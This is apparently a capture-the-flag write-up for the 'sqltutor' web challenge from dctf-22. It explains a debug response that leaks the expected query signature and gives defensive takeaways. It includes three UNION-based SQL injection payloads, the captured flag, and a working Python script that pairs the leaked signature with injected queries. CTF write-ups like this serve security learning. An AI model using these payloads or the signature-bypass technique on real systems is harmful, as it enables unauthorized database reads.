
@krnbhargav
Created April 18, 2022 12:41
dctf-22 | web

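sqltutor

Root cause, as far as the script below shows: with debug=1 the /execute response includes a debug.compare value whose first token is then accepted as the signature for the same submitted text, so the signature check does not restrict which query text runs, and the text appears to reach the SQL statement unescaped. The three UNION queries list the tables, list the columns of the flags table, then read the flag. Defensive takeaways: never return signature-comparison details to the client, keep debug output off in production, and bind user input as query parameters instead of concatenating it.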

./exploit.py "admin' UNION ALL SELECT table_name,2,3,4 FROM information_schema.tables WHERE table_schema=database()#"

./exploit.py "admin' UNION ALL SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='flags'#"

./exploit.py "admin' UNION ALL SELECT id,flag,0,0 from flags#"

FLAG : dctf{Pump_7h3_s7r3am_h4s5_up!_353aa965}

# solution of sqltutor
#!/usr/bin/env python3
#from requests import *
from httpx import *
from base64 import *
import sys
# Base URL of the challenge instance; endpoint paths are appended to it.
url = "https://sqltutor.dragonsec.si/"
# Optional debugging aid, left disabled: route requests through a local
# intercepting proxy listening on 127.0.0.1:8080 to inspect the traffic.
#proxies = {
# "http://":"http://127.0.0.1:8080",
# "https://":"http://127.0.0.1:8080"
#}
#client = Client(proxies = proxies)
# Module-level HTTP client shared by generate_hash() and send_payload().
client = Client()
def generate_hash(payload):
    """Return the signature token the server's debug output reports for *payload*.

    The payload is base64-encoded and posted to ``url + "execute"`` with a
    placeholder signature ("1") and ``debug`` set to "1". The result is the
    first space-separated token of ``response["debug"]["compare"]``.

    NOTE(review): presumably that token is the signature the server computed
    for the submitted text -- confirm against the challenge source. If so,
    the defect being demonstrated is a debug response that discloses the
    expected signature; the fix is to keep comparison details server-side.
    """
    encoded_text = b64encode(payload.encode()).decode()
    form_fields = {
        "text": encoded_text,
        "signature": "1",
        "queryNo": "0",
        "debug": "1",
    }
    reply = client.post(url + "execute", data=form_fields)
    compare_field = reply.json()['debug']['compare']
    # Only the leading token is kept; the rest of the field is discarded.
    return compare_field.split(" ")[0]
def send_payload(payload,_hash):
    """Post *payload* with signature *_hash* and return the decoded JSON reply.

    The payload is base64-encoded into the ``text`` form field, *_hash* is
    sent as ``signature``, and ``queryNo``/``debug`` are fixed to "0"/"1".
    No status or schema checks are made on the response; whatever
    ``.json()`` yields is returned unchanged.
    """
    encoded_text = b64encode(payload.encode()).decode()
    form_fields = {
        "text": encoded_text,
        "signature": _hash,
        "queryNo": "0",
        "debug": "1",
    }
    reply = client.post(url + "execute", data=form_fields)
    return reply.json()
if __name__ == "__main__":
    # The query text is the first command-line argument; a missing argument
    # surfaces as IndexError, exactly as in the original script.
    query_text = str(sys.argv[1])
    # First request obtains the signature token, second submits the signed text.
    signature_token = generate_hash(query_text)
    reply_json = send_payload(query_text, signature_token)
    print(reply_json)